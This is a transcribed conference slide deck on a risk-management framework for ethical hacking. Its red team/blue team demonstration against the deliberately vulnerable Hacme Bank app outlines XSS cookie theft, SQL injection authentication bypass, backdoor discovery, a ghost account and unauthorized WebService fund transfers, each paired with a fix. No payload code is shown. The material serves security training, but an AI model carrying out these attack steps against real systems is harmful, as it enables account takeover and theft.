Inverting Risk Management for Ethical Hacking. SecureWorld Expo 09

Similar documents
CSWAE Certified Secure Web Application Engineer

01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED

Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE. s3security.com

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

Certified Secure Web Application Engineer

Defense in Depth Security in the Enterprise

Internet of Things. Internet of Everything. Presented By: Louis McNeil Tom Costin

Vulnerability Management Policy

Automating the Top 20 CIS Critical Security Controls

epldt Web Builder Security March 2017

Technology Risk Management in Banking Industry. Rocky Cheng General Manager, Information Technology, Bank of China (Hong Kong) Limited

Ingram Micro Cyber Security Portfolio

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Building Security Into Applications

Continuously Discover and Eliminate Security Risk in Production Apps

DATA SHEET RISK & CYBERSECURITY PRACTICE EMPOWERING CUSTOMERS TO TAKE COMMAND OF THEIR EVOLVING RISK & CYBERSECURITY POSTURE

What are PCI DSS? PCI DSS = Payment Card Industry Data Security Standards

GOING WHERE NO WAFS HAVE GONE BEFORE

VULNERABILITIES IN 2017 CODE ANALYSIS WEB APPLICATION AUTOMATED

Effective Strategies for Managing Cybersecurity Risks

Protect Your Organization from Cyber Attacks

May 14, :30PM to 2:30PM CST. In Plain English: Cybersecurity and IT Exam Expectations

90% of data breaches are caused by software vulnerabilities.

Security Testing. - a requirement for a secure business. ISACA DAY in SOFIA. Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE

Integrigy Consulting Overview

DHG presenter. August 17, Addressing the Evolving Cybersecurity Landscape. DHG Birmingham CPE Seminar 1

Development*Process*for*Secure* So2ware

CyberSecurity. Penetration Testing. Penetration Testing. Contact one of our specialists for more information CYBERSECURITY SERVICE DATASHEET

Trustwave Managed Security Testing

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

To Audit Your IAM Program

Choosing the Right Security Assessment

C1: Define Security Requirements

Security Aspects Control Rationale Best Practices Self-Assessment (Click all that applicable) 1. Security Policy and Security Management

NIST Cybersecurity Framework Protect / Maintenance and Protective Technology

RiskSense Attack Surface Validation for Web Applications

CS 356 Operating System Security. Fall 2013

Certified Information Security Manager (CISM) Course Overview

Building Resilience in a Digital Enterprise

Will you be PCI DSS Compliant by September 2010?

Carbon Black PCI Compliance Mapping Checklist

Case Study: The Evolution of EMC s Product Security Office. Dan Reddy, CISSP, CSSLP EMC Product Security Office

Penetration Testing and Team Overview

Penetration testing.

Cybersecurity Panel: Cutting through Cybersecurity Hype with Practical Tips to Protect your Bank

Under the hood testing - Code Reviews - - Harshvardhan Parmar

Defense-in-Depth Against Malicious Software. Speaker name Title Group Microsoft Corporation

Today s Security Threats: Emerging Issues Keeping CFOs Up at Night Understanding & Protecting Against Information Security Breaches

Vulnerability Assessments and Penetration Testing

From Russia With Love

PROTECTING INFORMATION ASSETS NETWORK SECURITY

Protect Your Application with Secure Coding Practices. Barrie Dempster & Jason Foy JAM306 February 6, 2013

Think Like an Attacker

Students should have an understanding and a working knowledge in the following topics, or attend these courses as a pre-requisite:

Nebraska CERT Conference

The University of Queensland

Threat Modeling for System Builders and System Breakers!! Dan Copyright 2014 Denim Group - All Rights Reserved

Engineering Your Software For Attack

K12 Cybersecurity Roadmap

Infosec Europe 2009 Business Strategy Theatre. Giving Executives the Security Management Information that they Really Need

OWASP Top 10 The Ten Most Critical Web Application Security Risks

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Product Security Program

FTA 2017 SEATTLE. Cybersecurity and the State Tax Threat Environment. Copyright FireEye, Inc. All rights reserved.

Software Security Initiatives for Information Security Officers Marco Morana OWASP Cincinnati Chapter OWASP ISSA Cincinnati Chapter Meeting

hidden vulnerabilities

the SWIFT Customer Security

Cyber Protections: First Step, Risk Assessment

Cyber Risks in the Boardroom Conference

An ICS Whitepaper Choosing the Right Security Assessment

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Express Monitoring 2019

Comprehensive Database Security

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Web Application Penetration Testing

Aguascalientes Local Chapter. Kickoff

VULNERABILITY ASSESSMENT: SYSTEM AND NETWORK PENETRATION TESTING. Presented by: John O. Adeika Student ID:

Advanced Security Tester Course Outline

BUILDING CYBERSECURITY CAPABILITY, MATURITY, RESILIENCE

CCISO Blueprint v1. EC-Council

Security In A Box. Modular Security Services Offering - BFSI. A new concept to Security Services Delivery.

What every IT professional needs to know about penetration tests

Fundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring

SECURITY TRAINING SECURITY TRAINING

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Curso: Ethical Hacking and Countermeasures

Attackers Process. Compromise the Root of the Domain Network: Active Directory

Cyber Security Program

FFIEC Cyber Security Assessment Tool. Overview and Key Considerations

A (sample) computerized system for publishing the daily currency exchange rates

IMEC Cybersecurity for Manufacturers Penetration Testing and Top 10

Cybersecurity The Evolving Landscape

Security Audit What Why

ISO COMPLIANCE GUIDE. How Rapid7 Can Help You Achieve Compliance with ISO 27002

NCUA IT Exam Focus. By Tom Schauer, Principal CliftonLarsonAllen

Copyright

SDR Guide to Complete the SDR

New Jersey Association of School Business Officials Information Security K-12. June 5, 2014

Sneak Peak at CIS Critical Security Controls V 7 Release Date: March Presented by Kelli Tarala Principal Consultant Enclave Security

Certified Ethical Hacker V9

Transcription:

Inverting Risk Management for Ethical Hacking SecureWorld Expo 09

Agenda Speaker Introductions Learning Objectives Framework of Risk Management & Analysis (FoRMA) Duality of Risk Demonstration of Information Warfare Scenario Wrap-Up Q&A 2

Introductions Speaker Kris Kahn, CISSP, CISA, CGEIT, OPSA Senior Staff, Electronic Security Governance Seagate Technology LLC Co-Speaker Brian Shura, PCI-QSA Director of Penetration Testing AppSec Consulting 3

Audience Attendees should be involved with penetration testing or managing risks, such as... IT Security Staff Risk Managers Company Officers Ethical Hackers Recommended knowledge... Familiar with Security Best Practices Understand Risk Management Concepts Experience with Penetration Testing 4

Learning Objectives Understand the advantage of validating your security measures through ethical hacking Recognize the benefits of applying Risk Management and Risk Exploitation methods Understand your control options to mitigate risks Balance your enterprise security using FoRMA 5

FoRMA Overview

Benefits of FoRMA Big Picture Holistic relationship of related security models. Technology Independent Universal Risk Management concepts. Business Focused Minimize risk, instead of maximizing security. 7

Overview A Framework for integrating industry standard models, such as CIA*, STRIDE* and others Addresses Risk and Control elements: Risk Threat Vulnerability Control Technology Process *: See references at the end of the presentation material 8

Goal of FoRMA: Risk Mitigation I.e. Control risks within acceptable limits to support business objectives Establish Your Boundaries Define relevant policies, standards and best-practices Protect assets and resources in accordance with policy Detect policy violations Assure policy compliance 9

Building your foundation Start from the ground level and work your way up! Construct a strong security foundation to build your security policies, standards and best-practices. Use industry established security methodologies and codes of best practice to guide your standards and practices. A security foundation supports all layers (including physical, network, application, etc), and addresses each security implementation phase (Awareness, Protection, Detection, and Assurance). 10

Building your foundation Methodology Model Subject Threat Management Security Architecture Security Management Asset/Resource Management STRIDE* APAIN* RIVET* CIA* Threat Technology Process Vulnerability Use Methodology with Sub-Model to evaluate Subject *: See references at the end of the presentation material 11

Building your foundation This is a layered model based on the ISO Protocol model* which identifies five (of the original seven) layers where critical assets and resources can be identified. Physical Network System Application Data 12

Risk Mitigation Life Cycle Identify, Analyze, Control, Maintain, repeat. This process life cycle will guide you through the framework to the appropriate security resolution. Identify Source Threat Discovery Target Asset Valuation Result Business Survey Analyze Threat Assessment Vulnerability Assessment Assessed Risk Control Threat Mitigation Vulnerability Reduction Controlled Risk Maintain Threat Management Asset Management Managed Risk 13

Risk Mitigation Life Cycle: Identify Risks can be received through many input channels, if due to a security incident, the threat source needs to be identified to help guide the remediation. Inactive threats from untrusted sources should also be discovered. Valuating the business importance of the asset will drive the prioritization of the remedation. Identify Threat Discovery Asset Valuation Business Survey Analyze Control Maintain 14

Risk Mitigation Cycle: Analyze To determine the risk, you must understand the threat of attack and the vulnerability of the asset or resource. We measure and analyze these items in detail to determine the corresponding risk. Identify Analyze Threat Assessment Vulnerability Assessment Assessed Risk Control Maintain 15

Risk Mitigation Life Cycle: Control Once you have assessed the risk, you can apply controlmechanisms in the form of technology to mitigate the threat or reduce the vulnerability. Identify Analyze Control Threat Mitigation Vulnerability Reduction Controlled Risk Maintain 16

Risk Mitigation Life Cycle: Maintain Once a system is live, you apply counter-measures in the form of processes in the event of an attack (Incident Response) or to assure the integrity of the technology (Security Assessments). Implement change control and regular audit processes to verify when an aspect of the formula has changed. Identify Analyze Control Maintain Threat Management Asset/Resource Management Managed Risk 17

FoRMA Model Overview Awareness Risk Threat Process Technology Vulnerability Protection Control Assurance Detection 18

Implementation: Phases 1 2 Awareness Protection Assurance 4 Detection 3 19

Risk Mitigation Phases & Life Cycle Awareness Protection IACM IACM IACM IACM Assurance Detection 20

Duality of Risk

Risk Prevention vs Risk Exploitation Using opposing Objectives, the model can be used strategically to take advantage of vulnerabilities instead of preventing damage. Discover Identify Reconnaissance Evaluate Risks Analyze Evaluate Risks Mitigate Risks Control Exploit Risks Balance Risk/Control Maintain Risk/Control Divergence 22

Risk Analysis Strategies The Blue Team s strategy is create a balance by mitigating the risk by applying the appropriate amount of control. The remaining risk is acknowledged, regularly checked and managed. Risk = Control (+/- acceptable residual control/risk) The Red Team s strategy is to subvert the control and leverage the risk, keeping the scales tipped in their favor. Risk > Control Both teams need to analyze the risks and the controls to be able to execute their strategies. 23

FoRMA Model for Ethical Hacking Red Team Strategy Awareness Deception Threats Process Technology Vulnerabilities Protection Intrusion Blue Team Strategy Assurance Corruption Kris Kahn, 2009 http://www.cybernetix.com/forma Detection Evasion 24

Risk Exploitation Phases & Life Cycle Deception Intrusion IACM IACM IACM IACM Corruption Evasion 25

Information Warfare Scenario: Red Team/Blue Team Demonstration

Objectives Business Become profitable by offering banking services on-line Validate security controls through third-party Pen Test Blue Team - Operations Support the business by identifying and reducing risk Red Team - Ethical Hackers Exploit weaknesses to gain access to customer data, administrative functions, and financial transactions 27

Penetration and Defense Life-Cycles Blue Team 1. Awareness 2. Protection 3. Detection 4. Assurance Red Team 1. Deception 2. Intrusion 3. Evasion 4. Corruption Background: The business selected a Windows system running an IIS web server as their online customer interface to their WebService-based banking system and their back-end database system (MS SQL Server). 28

Target Free Penetration Testing platform Hacme Bank simulates a "real-world" web services-enabled online banking application, which was built with a number of known and common vulnerabilities. 09/16/2009 Kris Kahn, 2009 29

Red Team: Phase 1 Deception Intrusion I: Target Web Server Corruption IACM Evasion A: Manual JavaScript vulnerability test on Webbased forum C: Cross-Site Scripting (XSS) code to steal admin cookie and reuse M: Elevate privileges of own account to admin status 30

Analyze Risk Level: High Enter into forum to test: Result: Conclusion: Vulnerability exists to allow XSS attack that may lead to Elevation of Privileges (Admin access) 09/16/2009 Kris Kahn, 2009 31

Control & Maintain XSS code to steal and reuse cookie to gain access: Risk Level: High Maintain: Set attacker account privilege to Admin type 09/16/2009 Kris Kahn, 2009 32

Blue Team: Phase 1 I: Focus on accounts and authorized access Awareness Protection A: Validate user accounts and appropriate privileges Assurance Detection C: Repair access/accounts as necessary M: Improve coding practices IACM 33

Analyze Risk Level: High Validate Accounts through Database Conclusion: Admin privileges inappropriate for user account, may be due to error, root cause analysis in progress Remove unauthorized admin privileges for user account 09/16/2009 Kris Kahn, 2009 34

Control & Maintain Find XSS attack in forum and cleanup: Risk Level: Low Maintain: Patch to prevent special characters entered in forum using input validation, improve coding practices to anticipate this vulnerability 09/16/2009 Kris Kahn, 2009 35

Red Team: Phase 2 Deception Intrusion I: Target data flow A: Test for SQL injection vulnerabilities Corruption Evasion C: Exploit SQL injection flaws to bypass authentication and access admin account IACM M: Gather sensitive information from back-end database 36

Analyze Risk Level: Medium Perform manual test to use single quote (') to verify if a field is vulnerable to SQL Injection Conclusion: SQL injection is possible and may lead to Elevation of Privileges (Admin access) 09/16/2009 Kris Kahn, 2009 37

Control Risk Level: High Use SQL injection attack on password field 09/16/2009 Kris Kahn, 2009 38

Control Risk Level: High Successfully bypassed the authentication logic 09/16/2009 Kris Kahn, 2009 39

Maintain Risk Level: High Leverage admin function to gather additional data 09/16/2009 Kris Kahn, 2009 40

Blue Team: Phase 2 I: Focus on database server SQL activity Awareness Protection A: Assess potential unauthorized access to backend database through application Assurance Detection C: Install web application firewall for SQL injection protection M: Update application code to use parameterized queries to prevent SQL injection IACM 41

Analyze Risk Level: High Unauthorized SQL activity discovered Conclusion: Unauthorized access to database through application exposed user records with passwords 09/16/2009 Kris Kahn, 2009 42

Control & Maintain Risk Level: Low Install WebKnight to mitigate risk of SQL injection attacks Maintain: Update application code to use parameterized queries to prevent SQL injection Encrypt passwords in database 09/16/2009 Kris Kahn, 2009 43

Red Team: Phase 3 Deception Intrusion I: Target hidden directories and files Corruption Evasion A: Evade detection from using attack signatures and scan for application backdoors IACM C: Access the test admin functionality without authenticating M: Create ghost account for system owner 44

Analyze Use SensePost Wikto to identify backdoors Risk Level: Medium Conclusion: Back-door may lead to admin functionality 09/16/2009 Kris Kahn, 2009 45

Control & Maintain Exploit discovered development access to admin functionality Risk Level: High Maintain: Create ghost account similar to owner s name 09/16/2009 Kris Kahn, 2009 46

Blue Team: Phase 3 I: Focus on web activity Awareness Protection A: Review logs for problems or malicious activity C: Cleanup production environment and disable ghost account Assurance Detection M: Prevent external access to all admin functionality and only access admin functions locally IACM 47

Analyze Web Server log files, increased file size and activity Risk Level: High Conclusion: Web server scanning discovered a back-door exposing admin functionality (again) 09/16/2009 Kris Kahn, 2009 48

Control & Maintain Remove development back-door and ghost account Maintain: Prevent unauthorized access to admin tools use WebKnight to filter on the URL Risk Level: Low 09/16/2009 Kris Kahn, 2009 49

Maintain Risk Level: Low...and retain local admin functionality 09/16/2009 Kris Kahn, 2009 50

Red Team: Phase 4 Deception Intrusion I: Identify other opportunities to access back-end data by reviewing details of previous error messages Corruption Evasion A: Test access to XML forms C: Use WebService to transfer funds IACM M: Re-enable attacker account 51

Analyze Risk Level: Low Identify other non-application opportunities to access the data (captured previously) 09/16/2009 Kris Kahn, 2009 52

Analyze Test available methods Risk Level: Medium Conclusion: Lookup by userid method is not restricted 09/16/2009 Kris Kahn, 2009 53

Control Use the soapui tool to generate a request Risk Level: Medium 09/16/2009 Kris Kahn, 2009 54

Control Risk Level: Medium Acquire account number using the GetUserAccounts method 09/16/2009 Kris Kahn, 2009 55

Control Risk Level: Medium Determine system owner s account balance 09/16/2009 Kris Kahn, 2009 56

Control & Maintain Risk Level: High Transfer funds Maintain: Use WebService to re-enable attacker account 09/16/2009 Kris Kahn, 2009 57

Blue Team: Phase 4 I: Focus on transaction activity Awareness Protection A: Identify significant banking activity and look for errors C: Correct unauthorized account transfers, remove offending account Assurance Detection M: Implement authorization between the web application and the WebService IACM 58

Analyze Risk Level: High Identify significant banking activity and account balance discrepancy Conclusion: Internal WebService exposed externally is allowing unauthorized and unauthenticated access 09/16/2009 Kris Kahn, 2009 59

Control & Maintain Risk Level: Low Audit of all account activity and reverse unauthorized transactions. Implement manual approval control for large on-line transfers. Restrict the WebService to internal IP addresses only. Maintain: Implement authentication between the calling application (HackMe Bank) and the web service. 09/16/2009 Kris Kahn, 2009 60

Wrap-Up 61

Wrap-Up Design security controls with attacker perspective in mind (and visa-versa). Be proactive in the implementation of phased controls. Validate your controls through Ethical Hacking to ensure effectiveness. Balance your enterprise security using a risk-based framework (FoRMA) that is focused on supporting business objectives. 62

Questions? Feedback & Comments are welcome Contact information: Kris.Kahn@mac.com 831-419-1256 63

Tools (downloadable, non-commercial) Foundstone HacmeBank http://www.foundstone.com/us/resources/proddesc/ Paros hacmebank.htm http://www.parosproxy.org/ SensePost Wikto http://www.sensepost.com/research/wikto/ SoapUI http://www.soapui.org/ SQL Express Profiler http://code.google.com/p/sqlexpressprofiler/downloads/list WebKnight http://aqtronix.com/?pageid=99 09/16/2009 Kris Kahn, 2009 64

References (*) Control Objectives for IT and Related Technology (COBIT) trademarked by the IT Governance Institute (ITGI) Open System Interconnection (OSI) reference model was developed by the International Organization for Standardization (ISO) in 1984, and it is now considered the primary architectural model for intercomputer communications. STRIDE Threat Model, conceived, built upon, and evangelized at Microsoft by Loren Hohnfelder, Praerit Garg, Jason Garms, and Michael Howard. Explained further in Writing Secure Code, 2nd Ed (ISBN 0-7356-1722-8), pages 83-86. CIA Security Model, author unknown, taught as part of the Common Body of Knowledge for CISSP curriculum. APAIN Acronym for Security Architecture, developed by Curtis Coleman in 2001. RIVET Acronym for Security Management, developed by Kris Kahn 2004. Failure Mode and Effects Analysis (FMEA) evolved as a process tool used by the United States military as early as 1949 and is currently part of the SixSigma curriculum. Capability Maturity Model (CMM) is a trademark of Carnegie Mellon University. 65

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback